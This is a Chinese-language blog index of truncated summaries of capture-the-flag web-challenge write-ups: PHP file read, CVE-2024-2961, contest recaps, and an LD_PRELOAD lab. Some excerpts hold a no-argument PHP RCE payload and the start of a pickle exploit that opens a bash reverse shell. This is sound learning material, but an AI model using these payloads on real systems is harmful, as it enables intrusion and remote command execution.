摘要:
前言 这个其实不算啥大洞,主要是我遇到两次了,第一次是在黄河流域做那个题的时候,还有一次是ctfshow西瓜杯的题,做到了gxngxngxn师傅出的套皮。 就以这道ezphp入手吧。 分析&EXP 一看传参传个gxngxngxn就能读/etc/passwd,事实也的确如此。 但是我们显然是要做到打这 阅读全文
摘要:
前言 看了春秋杯夏季赛wp,发现那道wordpress就是先扫插件然后找到任意文件读取部分,用CVE-2024-2961来实现反弹shell或直接读操作,觉得这个点有点意思,跟前面学的侧信道、php-filter-chains啥的感觉有所关联,而且放假了也比较闲,于是写一篇文章来学学看看。 首先,这 阅读全文
摘要:
上午答辩完小学期结束了,刚好有题打,下午上线打打玩玩喽~ Hijack <?php highlight_file(__FILE__); error_reporting(E_ALL); ini_set('display_errors', 1); function filter($a) { $patte 阅读全文
摘要:
记录第二次线下 CISCN华北分区赛 说实话 队友真的给力带飞 但是断网环境下压力真的很大 我去年十一月进队当现役 没学多久就被队长叫去打国赛 而且还被指导老师点名去打到决赛一等奖 考完计网就坐车去天津 打完回去第二天还有个操作系统期末考试 打的前一天晚上我们两个队都没睡好 打pwn的队长甚至一夜没 阅读全文
摘要:
admin/admin弱密码登录, 扫网页发现/js/manage.js,访问得到js混淆代码,直接gpt梭: window.onload = function() { fetch('/source') .then(response => response.json()) .then(data => 阅读全文
摘要:
被pwn✌翰青带飞力 最高的时候打到了总榜第三,tql,虽然后面闲鱼老哥发力了,py太明目张胆给分数刷下去了,最后黑灯摆了就没交了,掉到60几了。 这里不谈其他,就谈谈web吧。 Simple_php ban了很多命令,但是没有ban掉diff和dd,可以使用diff读目录,dd读文件: 读根目录: 阅读全文
摘要:
Please_RCE_Me 方法很多,我用的无参数RCE方法读的: 这个正则形同虚设,大写就绕了。 task=var_dump(scandir(dirname(chdir(dirname(getcwd())))));&flag=Please_give_me_flag task=show_source 阅读全文
摘要:
没啥事干,打着玩玩。 练武题 还没想好名字的塔防游戏 打了半天啥也没有,下载源码直接搜: 牛逼。 结合提示,猜出加上页面那个一起字母大写刚好十八位: ISCC{MDWTSGTMMSSSPFRMMM} 代码审计 [De1ctf 2019]SSRF Me原题:[De1ctf 2019]SSRF Me(哈 阅读全文
摘要:
myfavorPython 无waf,pickle反弹shell。 import pickle import base64 import os class Exp(object): def __reduce__(self): return (os.system,("bash -c \"bash -i 阅读全文
摘要:
很多可以蚁剑插件自己做,因为本来就是蚁剑实验室的靶场,这里有些也就用手工方法,方便掌握原理。 LD_PRELOAD 看题目一眼环境变量劫持。 蚁剑可以连,但是终端命令全被ban了。 访问/?ant=phpinfo(); 查看禁用函数: pcntl_alarm,pcntl_fork,pcntl_wai 阅读全文